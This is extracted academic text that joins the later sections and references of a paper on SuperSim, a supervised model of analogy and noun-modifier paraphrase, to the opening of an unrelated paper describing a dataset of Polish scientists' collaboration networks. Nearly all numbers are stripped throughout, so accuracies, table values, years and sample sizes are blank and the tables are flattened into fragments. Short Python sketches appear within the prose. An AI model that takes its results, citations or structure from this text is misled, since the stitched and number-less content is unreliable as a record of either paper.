( ) . dual-space turney ( ) . bmi bollegala et al. ( ) . pairclass turney ( b) . pert turney ( a) . supersim — . lra turney ( b) . human average college applicant . table : the top ten results on five-choice sat questions. . ten-choice sat questions in addition to symmetries, proportional analogies have asymmetries. in general, if the quadruple 〈a, b, c, d〉 is positive, 〈a, d, c, b〉 is negative. for example, 〈word, language, note, music〉 is a good analogy, but 〈word, music, note, language〉 is not. words are the basic units of language and notes are the basic units of music, but words are not necessary for music and notes are not necessary for language. turney ( ) used this asymmetry to convert the five-choice sat questions into ten- choice sat questions. each choice 〈c, d〉 was expanded with the stem 〈a, b〉, resulting in the quadruple 〈a, b, c, d〉, and then the order was shuf- fled to 〈a, d, c, b〉, so that each choice pair in a five- choice question generated two choice quadruples in a ten-choice question. nine of the quadruples are negative examples and the quadruple consisting of the stem pair followed by the solution pair is the only positive example. the purpose of the ten-choice questions is to test the ability of measures of rela- tional similarity to avoid the asymmetric distractors. we use the ten-choice questions to compare the hand-coded dual-space approach (turney, ) with supersim. we also use these questions to per- form an ablation study of the four sets of features in supersim. 
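the evaluation protocol used for both question sets (folds that keep all of a question's quadruples together, and an argmax over per-choice probabilities) can be sketched as follows; the features are random placeholders, so the accuracy printed is only chance level, and in the real setup the probabilities are assigned to the question's choices rather than to training rows:

```python
import numpy as np
from sklearn.model_selection import GroupKFold
from sklearn.svm import SVC

rng = np.random.default_rng(1)
n_questions, rows_per_q = 20, 8                      # e.g. 4 positive + 4 negative rows per question
X = rng.normal(size=(n_questions * rows_per_q, 30))  # placeholder feature vectors
y = np.tile([1, 1, 1, 1, 0, 0, 0, 0], n_questions)
groups = np.repeat(np.arange(n_questions), rows_per_q)

correct = 0
for train, test in GroupKFold(n_splits=10).split(X, y, groups):
    clf = SVC(kernel="poly", degree=3, probability=True).fit(X[train], y[train])
    proba = clf.predict_proba(X[test])[:, 1]
    for q in np.unique(groups[test]):
        rows = np.where(groups[test] == q)[0]
        best = rows[np.argmax(proba[rows])]          # highest-probability row for this question
        correct += int(y[test][best] == 1)           # right if it corresponds to a positive example
print(correct / n_questions)
```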
as with the five-choice questions, we use the symmetries of proportional analogies to add three more positive examples, so the training dataset has nine negative examples and four posi- tive examples per question. we apply ten-fold cross- validation to the ten-choice questions. on the ten-choice questions, supersim’s score features algorithm lf ppmi dom fun correct dual-space . supersim . supersim . supersim . supersim . supersim . supersim . supersim . supersim . supersim . table : feature ablation with ten-choice sat questions. is . % (table ), compared to . % on the five-choice questions (table ), a drop of . %. the hand-coded dual-space model scores . % (table ), compared to . % on the five-choice questions (table ), a drop of . %. the dif- ference between supersim ( . %) and the hand- coded dual-space model ( . %) is not significant according to fisher’s exact test at the % confi- dence level. the advantage of supersim is that it does not need hand-coding. the results show that supersim can avoid the asymmetric distractors. table shows the impact of different subsets of features on the percentage of correct answers to the ten-choice sat questions. included features are marked and ablated features are marked . the results show that the log frequency (lf) and ppmi features are not helpful (but also not harmful) for relational similarity. we also see that domain space and function space are both needed for good results. . semeval task the semeval task dataset is based on the semantic relation classification scheme of bejar et al. ( ), consisting of ten high-level categories of relations and seventy-nine subcategories, with paradigmatic examples of each subcategory. for instance, the subcategory taxonomic in the cate- gory class inclusion has three paradigmatic exam- ples, flower:tulip, emotion:rage, and poem:sonnet. jurgens et al. ( ) used amazon’s mechanical turk to create the semeval task dataset in two phases. in the first phase, turkers expanded the paradigmatic examples for each subcategory to an algorithm reference spearman buap tovar et al. ( ) . duluth-v pedersen ( ) . duluth-v pedersen ( ) . duluth-v pedersen ( ) . utd-svm rink & harabagiu ( ) . utd-nb rink & harabagiu ( ) . rnn- mikolov et al. ( ) . utd-lda rink & harabagiu ( ) . com zhila et al. ( ) . supersim — . table : spearman correlations for semeval task . average of forty-one word pairs per subcategory, a total of , pairs. in the second phase, each word pair from the first phase was assigned a prototypical- ity score, indicating its similarity to the paradigmatic examples. the challenge of semeval task was to guess the prototypicality scores. supersim was trained on the five-choice sat questions and evaluated on the semeval task test dataset. for a given a word pair, we created quadruples, combining the word pair with each of the paradigmatic examples for its subcategory. we then used supersim to compute the probabilities for each quadruple. our guess for the prototypicality score of the given word pair was the average of the probabilities. spearman’s rank correlation coef- ficient between the turkers’ prototypicality scores and supersim’s scores was . , averaged over the sixty-nine subcategories in the testing set. super- sim has the highest spearman correlation achieved to date on semeval task (see table ). compositional similarity this section presents experiments using supersim to learn compositional similarity. 
the datasets con- sist of triples, 〈a, b, c〉, such that ab is a noun- modifier bigram and c is a noun unigram. the triples are labeled as positive and negative exam- ples of paraphrases. table shows that the fea- ture vectors have elements. we experiment with two datasets, seven-choice and fourteen-choice noun-modifier questions (turney, ). the seven-choice dataset is available at http://jair. org/papers/paper .html. the fourteen-choice dataset can be generated from the seven-choice dataset. stem: fantasy world choices: ( ) fairyland ( ) fantasy ( ) world ( ) phantasy ( ) universe ( ) ranter ( ) souring solution: ( ) fairyland table : a noun-modifier question based on wordnet. . noun-modifier questions the first dataset is a seven-choice noun-modifier question dataset, constructed from wordnet (tur- ney, ). the dataset contains questions for training and , for testing, a total of , ques- tions. table shows one of the questions. the stem is a bigram and the choices are uni- grams. the bigram is composed of a head noun (world), modified by an adjective or noun (fantasy). the solution is the unigram (fairyland) that belongs to the same wordnet synset as the stem. the distractors are designed to be difficult for cur- rent approaches to composition. for example, if fan- tasy world is represented by element-wise multipli- cation of the context vectors for fantasy and world (mitchell and lapata, ), the most likely guess is fantasy or world, not fairyland (turney, ). each seven-choice question yields seven labeled triples, by combining the stem with each choice. the triple 〈fantasy, world, fairyland〉 is labeled pos- itive and the other six triples are labeled negative. in general, if 〈a, b, c〉 is a positive example, then 〈b, a, c〉 is negative. for example, world fantasy is not a paraphrase of fairyland. the second dataset is constructed by applying this shuffling transfor- mation to convert the , seven-choice questions into , fourteen-choice questions (turney, ). the second dataset is designed to be difficult for approaches that are not sensitive to word order. table shows the percentage of the testing questions that are answered correctly for the two datasets. because vector addition and element-wise multiplication are not sensitive to word order, they perform poorly on the fourteen-choice questions. for both datasets, supersim performs significantly correct algorithm -choices -choices vector addition . . element-wise multiplication . . dual-space model . . supersim . . holistic model . — table : results for the two noun-modifier datasets. better than all other approaches, except for the holis- tic approach, according to fisher’s exact test at the % confidence level. the holistic approach is noncompositional. the stem bigram is represented by a single context vec- tor, generated by treating the bigram as if it were a unigram. a noncompositional approach cannot scale up to realistic applications (turney, ). the holistic approach cannot be applied to the fourteen- choice questions, because the bigrams in these ques- tions do not correspond to terms in wordnet, and hence they do not correspond to row vectors in the matrices we use (see section ). turney ( ) found it necessary to hand-code a soundness check into all of the algorithms (vector addition, element-wise multiplication, dual-space, and holistic). given a stem ab and a choice c, the hand-coded check assigns a minimal score to the choice if c = a or c = b. we do not need to hand- code any checking into supersim. 
it learns automat- ically from the training data to avoid such choices. . ablation experiments table shows the effects of ablating sets of fea- tures on the performance of supersim with the fourteen-choice questions. ppmi features are the most important; by themselves, they achieve . % correct, although the other features are needed to reach . %. domain space features reach the sec- ond highest performance when used alone ( . %), but they reduce performance (from . % to . %) when combined with other features; however, the drop is not significant according to fisher’s exact test at the % significance level. since the ppmi features play an important role in answering the noun-modifier questions, let us take the results for supersim are new but the other results in table are from turney ( ). features algorithm lf ppmi dom fun correct dual-space . supersim . supersim . supersim . supersim . supersim . supersim . supersim . supersim . supersim . table : ablation with fourteen-choice questions. ppmi feature subsets 〈a, b〉 〈a, c〉 〈b, c〉 correct . . . . . . . . table : ppmi subset ablation with fourteen-choices. a closer look at them. from table , we see that there are twelve ppmi features for the triple 〈a, b, c〉, where ab is a noun-modifier bigram and c is a noun unigram. we can split the twelve features into three subsets, one subset for each pair of words, 〈a, b〉, 〈a, c〉, and 〈b, c〉. for example, the subset for 〈a, b〉 is the four features ppmi(a, b, left), ppmi(b, a, left), ppmi(a, b, right), and ppmi(b, a, right). table shows the effects of ablating these subsets. the results in table indicate that all three ppmi subsets contribute to the performance of supersim, but the 〈a, b〉 subset contributes more than the other two subsets. the 〈a, b〉 features help to increase the sensitivity of supersim to the order of the words in the noun-modifier bigram; for exam- ple, they make it easier to distinguish fantasy world from world fantasy. . holistic training supersim uses training questions to learn to rec- ognize when a bigram is a paraphrase of a unigram; it learns from expert knowledge implicit in wordnet stem: search engine choices: ( ) search engine ( ) search ( ) engine ( ) search language ( ) search warrant ( ) diesel engine ( ) steam engine solution: ( ) search engine table : a question based on holistic vectors. synsets. it would be advantageous to be able to train supersim with less reliance on expert knowledge. past work with adjective-noun bigrams has shown that we can use holistic bigram vectors to train a supervised regression model (guevara, ; baroni and zamparelli, ). the output of the regression model is a vector representation for a bigram that approximates the holistic vector for the bigram; that is, it approximates the vector we would get by treat- ing the bigram as if it were a unigram. supersim does not generate vectors as output, but we can still use holistic bigram vectors for training. table shows a seven-choice training question that was generated without using wordnet synsets. the choices of the form a b are bigrams, but we repre- sent them with holistic bigram vectors; we pretend they are unigrams. we call a b bigrams pseudo- unigrams. as far as supersim is concerned, there is no difference between these pseudo-unigrams and true unigrams. the question in table is treated the same as the question in table . 
we generate holistic training questions by randomly selecting noun-modifier bigrams from wordnet as stems for the questions (search engine), avoiding any bigrams that appear as stems in the testing questions. the solution (search engine) is the pseudo-unigram that corresponds to the stem bigram. in the matrices in section , each term in wordnet corresponds to a row vector. these corresponding row vectors enable us to treat bigrams from wordnet as if they were unigrams. the distractors are the component unigrams in the stem bigram (search and engine) and pseudo- unigrams that share a component word with the stem (search warrant, diesel engine). to construct the holistic training questions, we used wordnet as a correct training -choices -choices holistic . . standard . . table : results for supersim with holistic training. source of bigrams, but we ignored the rich infor- mation that wordnet provides about these bigrams, such as their synonyms, hypernyms, hyponyms, meronyms, and glosses. table compares holistic training to standard training (that is, training with questions like table versus training with questions like table ). the testing set is the standard testing set in both cases. there is a significant drop in performance with holistic training, but the performance still surpasses vector addition, element-wise multiplication, and the hand-coded dual-space model (see table ). since holistic questions can be generated auto- matically without human expertise, we experi- mented with increasing the size of the holistic train- ing dataset, growing it from , to , ques- tions in increments of , . the performance on the fourteen-choice questions with holistic train- ing and standard testing varied between . % and . % correct, with no clear trend up or down. this is not significantly different from the performance with holistic training questions ( . %). it seems likely that the drop in performance with holistic training instead of standard training is due to a difference in the nature of the standard questions (table ) and the holistic questions (table ). we are currently investigating this issue. we expect to be able to close the performance gap in future work, by improving the holistic questions. however, it is possible that there are fundamental limits to holistic training. discussion supersim performs slightly better (not statistically significant) than the hand-coded dual-space model on relational similarity problems (section ), but it performs much better on compositional similarity problems (section ). the ablation studies suggest this is due to the ppmi features, which have no effect on ten-choice sat performance (table ), but have a large effect on fourteen-choice noun-modifier para- phrase performance (table ). one advantage of supervised learning over hand- coding is that it facilitates adding new features. it is not clear how to modify the hand-coded equations for the dual-space model of noun-modifier composi- tion (turney, ) to include ppmi information. supersim is one of the few approaches to distri- butional semantics beyond words that has attempted to address both relational and compositional similar- ity (see section . ). it is a strength of this approach that it works well with both kinds of similarity. future work and limitations given the promising results with holistic training for noun-modifier paraphrases, we plan to experiment with holistic training for analogies. 
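a small sketch of how such holistic training questions could be generated; the bigram list is a tiny invented stand-in for the wordnet noun-modifier terms, and the distractor counts are arbitrary:

```python
import random

bigrams = ["search engine", "search language", "search warrant",
           "diesel engine", "steam engine", "fantasy world", "fish tank"]  # assumed stand-in
test_stems = {"fantasy world"}          # stems reserved for the testing questions are excluded

def holistic_question(rng):
    stem = rng.choice([b for b in bigrams if b not in test_stems])
    modifier, head = stem.split()
    sharing = [b for b in bigrams
               if b != stem and (modifier in b.split() or head in b.split())]
    distractors = [modifier, head] + rng.sample(sharing, k=min(4, len(sharing)))
    return {"stem": stem, "choices": [stem] + distractors, "solution": stem}

print(holistic_question(random.Random(0)))
```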
consider the proportional analogy hard is to hard time as good is to good time, where hard time and good time are pseudo-unigrams. to a human, this analogy is triv- ial, but supersim has no access to the surface form of a term. as far as supersim is concerned, this analogy is much the same as the analogy hard is to difficulty as good is to fun. this strategy automat- ically converts simple, easily generated analogies into more complex, challenging analogies, which may be suited to training supersim. this also suggests that noun-modifier paraphrases may be used to solve analogies. perhaps we can evaluate the quality of a candidate analogy 〈a, b, c, d〉 by searching for a term e such that 〈b, e, a〉 and 〈d, e, c〉 are good paraphrases. for example, consider the analogy mason is to stone as carpenter is to wood. we can paraphrase mason as stone worker and carpenter as wood worker. this transforms the analogy to stone worker is to stone as wood worker is to wood, which makes it easier to recognize the relational similarity. another area for future work is extending super- sim beyond noun-modifier paraphrases to measur- ing the similarity of sentence pairs. we plan to adapt ideas from socher et al. ( ) for this task. they use dynamic pooling to represent sentences of vary- ing size with fixed-size feature vectors. using fixed- size feature vectors avoids the problem of quadratic growth and it enables the supervised learner to gen- eralize over sentences of varying length. some of the competing approaches discussed by erk ( ) incorporate formal logic. the work of baroni et al. ( ) suggests ways that supersim could be developed to deal with logic. we believe that supersim could benefit from more features, with greater diversity. one place to look for these features is higher levels in the hierar- chy that we sketch in section . our ablation experiments suggest that domain and function spaces provide the most important features for relational similarity, but ppmi values provide the most important features for noun-modifier composi- tional similarity. explaining this is another topic for future research. conclusion in this paper, we have presented supersim, a unified approach to analogy (relational similarity) and para- phrase (compositional similarity). supersim treats them both as problems of supervised tuple classifi- cation. the supervised learning algorithm is a stan- dard support vector machine. the main contribution of supersim is a set of four types of features for rep- resenting tuples. the features work well with both analogy and paraphrase, with no task-specific mod- ifications. supersim matches the state of the art on sat analogy questions and substantially advances the state of the art on the semeval task chal- lenge and the noun-modifier paraphrase questions. supersim runs much faster than lra (turney, b), answering the sat questions in minutes instead of days. unlike the dual-space model (tur- ney, ), supersim requires no hand-coded simi- larity composition functions. since there is no hand- coding, it is easy to add new features to supersim. much work remains to be done, such as incorporat- ing logic and scaling up to sentence paraphrases, but past work suggests that these problems are tractable. in the four approaches described by erk ( ), supersim is an instance of the second approach to extending distributional semantics beyond words, comparing word pairs, phrases, or sentences (in gen- eral, tuples) by combining multiple pairwise simi- larity values. 
perhaps the main significance of this paper is that it provides some evidence in support of this general approach. references eneko agirre, daniel cer, mona diab, and aitor gonzalez-agirre. . semeval- task : a pilot on semantic textual similarity. in proceedings of the first joint conference on lexical and compu- tational semantics (*sem), pages – , montréal, canada. ion androutsopoulos and prodromos malakasiotis. . a survey of paraphrasing and textual entailment methods. journal of artificial intelligence research, : – . marco baroni and roberto zamparelli. . nouns are vectors, adjectives are matrices: representing adjective-noun constructions in semantic space. in proceedings of the conference on empirical methods in natural language processing (emnlp ), pages – . marco baroni, raffaella bernardi, ngoc-quynh do, and chung-chieh shan. . entailment above the word level in distributional semantics. in proceedings of the th conference of the european chapter of the asso- ciation for computational linguistics (eacl ), pages – . isaac i. bejar, roger chaffin, and susan e. embretson. . cognitive and psychometric analysis of ana- logical problem solving. springer-verlag. ergun biçici and deniz yuret. . clustering word pairs to answer analogy questions. in proceedings of the fifteenth turkish symposium on artificial intelli- gence and neural networks (tainn ), akyaka, mugla, turkey. danushka bollegala, yutaka matsuo, and mitsuru ishizuka. . www sits the sat: measuring rela- tional similarity on the web. in proceedings of the th european conference on artificial intelligence (ecai ), pages – , patras, greece. danushka bollegala, yutaka matsuo, and mitsuru ishizuka. . measuring the similarity between implicit semantic relations from the web. in proceed- ings of the th international conference on world wide web (www ), pages – . john bullinaria and joseph levy. . extract- ing semantic representations from word co-occurrence statistics: a computational study. behavior research methods, ( ): – . john bullinaria and joseph levy. . extract- ing semantic representations from word co-occurrence statistics: stop-lists, stemming, and svd. behavior research methods, ( ): – . john caron. . experiments with lsa scor- ing: optimal rank and basis. in proceedings of the siam computational information retrieval work- shop, pages – , raleigh, nc. kenneth church and patrick hanks. . word asso- ciation norms, mutual information, and lexicography. in proceedings of the th annual conference of the association of computational linguistics, pages – , vancouver, british columbia. daoud clarke. . a context-theoretic framework for compositionality in distributional semantics. compu- tational linguistics, ( ): – . katrin erk. . towards a semantics for distributional representations. in proceedings of the th interna- tional conference on computational semantics (iwcs ), potsdam, germany. john rupert firth. . a synopsis of linguistic theory – . in studies in linguistic analysis, pages – . blackwell, oxford. dan garrette, katrin erk, and ray mooney. . inte- grating logical representations with probabilistic infor- mation using markov logic. in proceedings of the th international conference on computational semantics (iwcs ), pages – . dedre gentner. . structure-mapping: a theoretical framework for analogy. cognitive science, ( ): – . roxana girju, preslav nakov, vivi nastase, stan szpakowicz, peter turney, and deniz yuret. . semeval- task : classification of semantic relations between nominals. 
in proceedings of the fourth international workshop on semantic evalua- tions (semeval ), pages – , prague, czech republic. emiliano guevara. . a regression model of adjective-noun compositionality in distributional semantics. in proceedings of the workshop on geometrical models of natural language semantics (gems ), pages – . zellig harris. . distributional structure. word, ( ): – . iris hendrickx, su nam kim, zornitsa kozareva, preslav nakov, diarmuid ó séaghdha, sebastian padó, marco pennacchiotti, lorenza romano, and stan szpakow- icz. . semeval- task : multi-way classifica- tion of semantic relations between pairs of nominals. in proceedings of the th international workshop on semantic evaluation, pages – , uppsala, sweden. amaç herdağdelen and marco baroni. . bagpack: a general framework to represent semantic relations. in proceedings of the eacl geometrical models for natural language semantics (gems) workshop, pages – . nathalie japkowicz and shaju stephen. . the class imbalance problem: a systematic study. intelligent data analysis, ( ): – . david a. jurgens, saif m. mohammad, peter d. tur- ney, and keith j. holyoak. . semeval- task : measuring degrees of relational similarity. in proceedings of the first joint conference on lexi- cal and computational semantics (*sem), pages – , montréal, canada. thomas k. landauer and susan t. dumais. . a solution to plato’s problem: the latent seman- tic analysis theory of the acquisition, induction, and representation of knowledge. psychological review, ( ): – . benoı̂t lemaire and guy denhière. . effects of high-order co-occurrences on word semantic similar- ity. current psychology letters: behaviour, brain & cognition, ( ). yves lepage and ando shin-ichi. . saussurian analogy: a theoretical account and its application. in proceedings of the th international conference on computational linguistics (coling ), pages – . kevin lund, curt burgess, and ruth ann atchley. . semantic and associative priming in high-dimensional semantic space. in proceedings of the th annual conference of the cognitive science society, pages – . tomas mikolov, wen-tau yih, and geoffrey zweig. . linguistic regularities in continuous space word representations. in proceedings of the confer- ence of the north american chapter of the associa- tion for computational linguistics: human language technologies (naacl ), atlanta, georgia. jeff mitchell and mirella lapata. . vector-based models of semantic composition. in proceedings of acl- : hlt, pages – , columbus, ohio. association for computational linguistics. jeff mitchell and mirella lapata. . composition in distributional models of semantics. cognitive science, ( ): – . ted pedersen. . duluth: measuring degrees of relational similarity with the gloss vector measure of semantic relatedness. in first joint conference on lexical and computational semantics (*sem), pages – , montreal, canada. john c. platt. . fast training of support vector machines using sequential minimal optimization. in advances in kernel methods: support vector learn- ing, pages – , cambridge, ma. mit press. bryan rink and sanda harabagiu. . utd: deter- mining relational similarity using lexical patterns. in first joint conference on lexical and computational semantics (*sem), pages – , montreal, canada. bryan rink and sanda harabagiu. . the impact of selectional preference agreement on semantic rela- tional similarity. in proceedings of the th interna- tional conference on computational semantics (iwcs ), potsdam, germany. richard socher, eric h. 
huang, jeffrey pennington, andrew y. ng, and christopher d. manning. . dynamic pooling and unfolding recursive autoen- coders for paraphrase detection. in advances in neural information processing systems (nips ), pages – . richard socher, brody huval, christopher manning, and andrew ng. . semantic compositionality through recursive matrix-vector spaces. in proceed- ings of the joint conference on empirical meth- ods in natural language processing and computa- tional natural language learning (emnlp-conll ), pages – . mireya tovar, j. alejandro reyes, azucena montes, darnes vilariño, david pinto, and saul león. . buap: a first approximation to relational similar- ity measuring. in first joint conference on lexi- cal and computational semantics (*sem), pages – , montreal, canada. peter d. turney and michael l. littman. . corpus- based learning of analogies and semantic relations. machine learning, ( – ): – . peter d. turney and patrick pantel. . from fre- quency to meaning: vector space models of semantics. journal of artificial intelligence research, : – . peter d. turney, michael l. littman, jeffrey bigham, and victor shnayder. . combining independent mod- ules to solve multiple-choice synonym and analogy problems. in proceedings of the international con- ference on recent advances in natural language pro- cessing (ranlp- ), pages – , borovets, bul- garia. peter d. turney, yair neuman, dan assaf, and yohai cohen. . literal and metaphorical sense identifi- cation through concrete and abstract context. in pro- ceedings of the conference on empirical meth- ods in natural language processing, pages – . peter d. turney. a. expressing implicit semantic relations without supervision. in proceedings of the st international conference on computational lin- guistics and th annual meeting of the association for computational linguistics (coling/acl- ), pages – , sydney, australia. peter d. turney. b. similarity of semantic relations. computational linguistics, ( ): – . peter d. turney. a. the latent relation mapping engine: algorithm and experiments. journal of artifi- cial intelligence research, : – . peter d. turney. b. a uniform approach to analo- gies, synonyms, antonyms, and associations. in pro- ceedings of the nd international conference on computational linguistics (coling ), pages – , manchester, uk. peter d. turney. . domain and function: a dual- space model of semantic relations and compositions. journal of artificial intelligence research, : – . tony veale. . wordnet sits the sat: a knowledge- based approach to lexical analogy. in proceedings of the th european conference on artificial intel- ligence (ecai ), pages – , valencia, spain. ian h. witten, eibe frank, and mark a. hall. . data mining: practical machine learning tools and tech- niques, third edition. morgan kaufmann, san fran- cisco. alisa zhila, wen-tau yih, christopher meek, geoffrey zweig, and tomas mikolov. . combining het- erogeneous models for measuring relational similar- ity. in proceedings of the conference of the north american chapter of the association for com- putational linguistics: human language technolo- gies (naacl ), atlanta, georgia. © authors. this work is licensed under the creative commons attribution . license (https://creativecommons.org/licenses/by/ . /). issue | vol. article | doi: . /connections- - connections academic collaboration via resource contributions: an egocentric dataset michał bojanowski, ,* dominika czerniawska and wojciech fenrich kozminski university, warsaw, poland. 
university of manchester, manchester, uk and university of warsaw, warsaw, poland. university of warsaw, warsaw, poland. *e-mail: michal @gmail.com abstract in order to understand scientists’ incentives to form collaborative relations, we have conducted a study looking into academically relevant resources, which scientists contribute into collaborations with others. the data we describe in this paper are an egocentric dataset assembled by coding originally qualitative material. it is multiplex ego networks containing data on individual attributes (such as gender, scientific degree), collaboration ties (including alter–alter ties), and resource flows. resources are coded using a developed inventory of types of academically relevant resources egos and alters contribute into their collaborations. we share the data with the research community with the hopes of enriching knowledge and tools for studying sociological and behavioral aspects of science as a social process. keywords collaboration networks, resources, sociology of science, ego networks. scientometric studies report steadily increasing trend in multi-authored scientific publications. it is clearly an evidence that contemporary science requires cooperation and is not anymore a traditionally individualistic activity (moody, ). the presented data set comes from a study in which our overarching research goal was to understand why some scientists collaborate, but some others do not. in particular, our approach was to think about incentives that might lead them to do so. inspired by coleman ( ) and, among others, laudel ( ), lewis et al. ( ) as well as our earlier results (czerniawska et al., ), we assume that the incentives to collaborate come from academically relevant resources the scientists possess or control and the interests they might have in resources possessed or controlled by others. for example, a theorist and an experimentalist might be interested in each other’s resources – ability to develop theoretical model of the studied problem and skills in conducting experiments, respectively. unequal distribution of these resources across academic community and the necessity of pooling them to get ahead in contemporary science results in incentives to collaborate. current state of knowledge still lacks a universally accepted behavioral understanding of the scientific process, let alone standardized tools for measuring academically relevant resources. hence, we conducted a qualitative study among polish scientists with the goal to: . collect egocentric data on collaborative relations; . develop an inventory of academically relevant resources from respondents’ reports; and . measure what resources (item ) collaborating parties (ego and alters) engage in their collab- oration ties (item ). the data we hereby share are based on transcriptions and coding of the originally qualitative material. the second section provides some brief background information on science in poland and details our contribution. the presented study involved interviews conducted on a sample of polish scientists, academic collaboration via resource contributions: an egocentric dataset which we describe further in the third section. in the fourth section, we describe the way in which the inventory of resources was constructed. a complete list with example quotes is provided on the associated website. the fifth section describes the structure of the data set. the sixth section provides illustrative examples. 
the seventh section provides the details where the data can be found and how it can be accessed. finally, in the eight section, we discuss limitations and potential uses of the data. background and contribution the presented data come from a study, which was conducted in poland among polish researchers. polish scientific community is among the largest in europe: according to oecd ( ) statistics, there were , researchers in poland in . at the same time, the funding and material resources are only average (cf. czerniawska, ; kwiek and szadkowski, ). these conditions, next to some others, keep polish science largely outside of the strict core of international scientific collaboration (leydesdorff et al., ). the organization and institutions of polish scientific system resemble “continental” systems (e.g. german scientific system). a typical scientific career requires a four year phd program, a habilitation which is expected within eight years after a phd. obtaining a habilitation is perceived as the final step to becoming an independent scholar. polish scientific community, similarly to many other scientific communities in europe, is rather diverse. it is a mix of modern, competitive, internationalized disciplines and groups, and more conservative locally oriented areas (kwiek, ). explaining the presence or absence of collabo- ration relations among scientists by referring to complementarities between them is not a new idea. for example, qin et al. ( ) in their bibliometric analysis use institutional affiliation to capture different specialization of scientists. moody ( ) approximates different types of contributions by analyzing subject codes put on articles indexed by sociological abstracts. our goal was to collect a list of resources they believe are relevant when working as a scientist. we believe a genuine contribution of the presented data set lies in that detailed information on the flow of resources in scientific collaborations. the catalogue, which is a unique contribution in scientific collaboration studies, was constructed based on the extensive literature review and themes mentioned by our interviewees. the data have been used to study whether structurally non-redundant ties are more likely to be characterized with resource contributions not found in other ties (bojanowski and czerniawska, ). sample data come from individual in-depth interviews (idi) conducted between april and august by two interviewers. the quota sample consists of female and male scientists from six polish cities. respondents represented a broad range of disciplines: natural sciences, social sciences, life sciences, the humanities, engineering, and technology on different levels of career from phd candidates to professors. the interviewees mentioned collaborators in total. interviews lasting between and min were recorded and later transcribed. measurement each interview consisted of several parts, three of which are of relevance here: . respondents were asked to name up to important researchers they have collaborated with during last five years. each collaborator was discussed separately giving information about gender, scientific degree, nationality, and university department (if possible). see section . below. . during the interview a network of collaboration among collaborators mentioned in item ( ) was reconstructed using cork board, pins, and rub- ber bands. see the example in figure . cork boards were photographed and later digitized into edgelist data. see section . below. . 
for each collaborator, the respondents were asked about academically relevant resources he/she contributed to the collaboration and what resources were contributed by the collaborator. interviewees were provided with a broad framework, which would help them identify resources such as financial resources (e.g. funding), human resources (e.g. knowledge, skills), and social resources (e.g. collaborators). . interviews were audio-recorded and later transcribed. the text of the transcripts was analyzed using qda miner lite (a product of provalis research, see https://provalisresearch.com/products/qualitative-data-analysis-software/) in order to code resources engaged by respondents (the egos) and their collaborators (the alters) to every collaboration; the resulting resource inventory with example quotes is available at https://recon-icm.github.io/reconqdata/articles/resource_inventory.html. the coding was performed by two persons. a random sample of the interviews was double-checked by different researchers to ensure reliability. the data are available in table resources and described in detail below. while collaboration networks assembled from part ( ) include alter–alter ties, the data on resources from part ( ) were acquired for ego-alter dyads only.
figure : using cork board, pins, and rubber bands to collect data on collaborations. small cards contained names or nicknames which have been masked.
structure of the data
the data are contained in three inter-related tables diagrammatically presented in figure . below we describe each table in detail.
figure : the data consist of three interrelated tables. table 'nodes' contains information about all persons. table 'collaboration' is an edgelist of collaboration ties. table 'resources' is a multiplex edgelist of resource flows.
node attributes
the table nodes contains information about every person in the study – all egos and all alters. it has rows and the following seven variables:
• id_interview – interview identification number.
• id_node – person identification number, unique within each interview.
• is_ego – binary variable equal to if person is the ego (respondent), otherwise.
• is_polish – binary variable equal to if person is affiliated with a polish academic institution, otherwise.
• department – marking scientists if they work at the same department. if department is not missing then all scientists within the same interview sharing the same value of department work at the same department at the same university.
• scidegree – scientific degree of the scientist. one of "mgr" = ma, "dr" = phd, "drhab" = habilitated doctor, or "prof" = full professor.
• female – binary variable equal to if person is female, if male.
the pair of variables id_interview and id_node together constitutes a key uniquely identifying each row in the nodes table.
collaboration networks
the table collaboration is essentially an edge list of collaboration ties. it has , rows and the following three variables:
• id_interview – interview identification number.
• from and to – person identification numbers referencing the id_node variable from the nodes table.
in other words, a row consisting of values, say, id_interview = , from = , to = indicates that researchers and were reported as collaborating in interview .
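a minimal sketch of reading and joining the first two tables outside of r, e.g. with pandas; the file names and the exact column spellings (id_interview, id_node, from, to) are assumptions based on the variable list above, and the csv files themselves are the ones linked from the repository readme:

```python
import pandas as pd

nodes = pd.read_csv("nodes.csv")                 # file names assumed
collaboration = pd.read_csv("collaboration.csv")

# attach node attributes to both endpoints of every collaboration tie
edges = (collaboration
         .merge(nodes.add_suffix("_from"),
                left_on=["id_interview", "from"],
                right_on=["id_interview_from", "id_node_from"])
         .merge(nodes.add_suffix("_to"),
                left_on=["id_interview", "to"],
                right_on=["id_interview_to", "id_node_to"]))

print(edges[["id_interview", "from", "to", "female_from", "female_to"]].head())
```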
the data are provided in table resources having , rows and the following four columns: • id _ interview – interview identification number. • from and two – person identification numbers (within each interview) referencing the id _ node variable from the nodes table. • code – a textual code identifying type of re- source contributed by researcher from into the collaboration with researcher to. resources engaged in collaborations (variable code) were coded with a coding scheme covering different elements of a research process in different disciplines. the scheme consists of codes such as: • ‘conceptualisation’ – coming up with an idea for a study, providing general theoretical framework; designing a general framework for a study. • ‘methodology’ – designing methodology for a study. • ‘investigation’ – conducting research, gather- ing data. • ‘data analysis’ – data analysis, quantitative as well as qualitative. • ‘data curation’ – managing and archiving data. • ‘software creation’ – writing software for re- search process. • ‘prototype construction’ – building a proto- type that is used in research process. complete list of codes together with examples of coded interview fragments is available at the website. table . frequencies of gender and scientific degree for egos and alters. symbol ‘–’(dash) corresponds to missing data. gender degree alter ego female full professor female habilitated phd female ma female phd male full professor male habilitated phd male ma male phd – ma – – phd – – – – selected descriptives as a glimpse into the data, table shows frequency distribution of gender and scientific degree for egos and alters separately. figure shows resource flow networks from one of the interviews: accessing the data the data are available in a github repository at https://recon-icm.github.io/reconqdata as an r package with accessible files in a csv format. users can use the data with r by installing the package or download the data files in csv format using urls provided in the readme file. discussion we close by discussing potential uses and limitations of the documented data set. we think that the data we share can be used in several contexts with substantive and methodological goals in mind. on the substantive side, the data can be used to address several research questions. for example to analyze co-appearance of different types of resources in collaboration ties – certain https://recon-icm.github.io/reconqdata/articles/resource_ inventory.html. connections figure : collaboration (dashed, undirected) and resource flow (solid, directed) ties from one of the interviews. types of resources tend to be contributed together. further, the resource catalog could be improved and perhaps serve as a starting point for constructing a more standardized survey instrument. on the methodological side, the value of the data set is that it is egocentric and multiplex at the same time. we see active development in statistical models for data collected through egocentric design (krivitsky and morris, ) as well as in modeling multilayer networks (krivitsky et al., ). the data we share can be a useful test bed for such models. the data have certain limitations. first, it comes from a qualitative study conducted on a quota sample. the obvious limitation is the lack of representativeness in the strict statistical sense. 
